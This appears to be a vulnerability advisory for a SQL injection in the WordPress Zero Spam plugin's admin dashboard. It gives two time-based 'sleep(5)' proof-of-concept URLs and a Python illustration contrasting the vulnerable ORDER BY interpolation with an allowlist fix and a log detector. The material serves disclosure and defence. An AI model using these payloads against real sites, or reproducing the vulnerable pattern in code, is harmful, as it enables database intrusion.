The plugin does not properly sanitise and escape the order and orderby parameters before using them in a SQL statement in the admin dashboard, leading to a SQL injection.
With at least one IP in the “Blocked IPs” list:

https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=1%20and%20sleep(5)

https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard&tab=blocked&orderby=date_added&order=+and+sleep(5)
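The following is an added illustration, not code from the advisory or from the plugin: it shows how the flawed pattern turns the PoC parameters into SQL, the allowlist check that prevents it, and a log-review helper that flags such requests. The sortable column names other than date_added are assumed placeholders.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed allowlist of sortable columns for the blocked-IP table. Only
# "date_added" appears in the advisory; the other names are placeholders.
ALLOWED_ORDERBY = {"id", "ip_address", "date_added"}
ALLOWED_ORDER = {"asc", "desc"}

# The two PoC URLs from the advisory, kept here as sample input.
POC_SLEEP_ORDERBY = ("https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard"
                     "&tab=blocked&orderby=1%20and%20sleep(5)")
POC_SLEEP_ORDER = ("https://example.com/wp-admin/?page=wordpress-zero-spam-dashboard"
                   "&tab=blocked&orderby=date_added&order=+and+sleep(5)")

def query_params(url):
    """Decode a dashboard URL's query string into {name: first_value}."""
    parsed = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {k: v[0] for k, v in parsed.items()}

def vulnerable_order_clause(params):
    """The flawed pattern the advisory describes: request values are interpolated
    into ORDER BY unchanged, so anything after the column name becomes SQL."""
    orderby = params.get("orderby", "date_added")
    order = params.get("order", "desc")
    return f"ORDER BY {orderby} {order}"

def hardened_order_clause(params):
    """Fix: only allowlisted column names and directions reach the SQL string;
    anything else falls back to the default sort."""
    orderby = params.get("orderby", "date_added").strip().lower()
    order = params.get("order", "desc").strip().lower()
    if orderby not in ALLOWED_ORDERBY:
        orderby = "date_added"
    if order not in ALLOWED_ORDER:
        order = "desc"
    return f"ORDER BY `{orderby}` {order.upper()}"

def is_suspicious_sort_request(url):
    """Log-review helper: flag dashboard requests whose sort parameters are not
    plain allowlisted values, which is exactly what the PoC URLs look like."""
    params = query_params(url)
    if params.get("page") != "wordpress-zero-spam-dashboard":
        return False
    orderby = params.get("orderby", "date_added").strip().lower()
    order = params.get("order", "desc").strip().lower()
    return orderby not in ALLOWED_ORDERBY or order not in ALLOWED_ORDER

if __name__ == "__main__":
    p = query_params(POC_SLEEP_ORDER)
    print(vulnerable_order_clause(p))        # ORDER BY date_added  and sleep(5)
    print(hardened_order_clause(p))          # ORDER BY `date_added` DESC
    print(is_suspicious_sort_request(POC_SLEEP_ORDER))  # True
```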
JrXnm
JrXnm
Yes
2022-02-18
2022-02-18
2022-04-09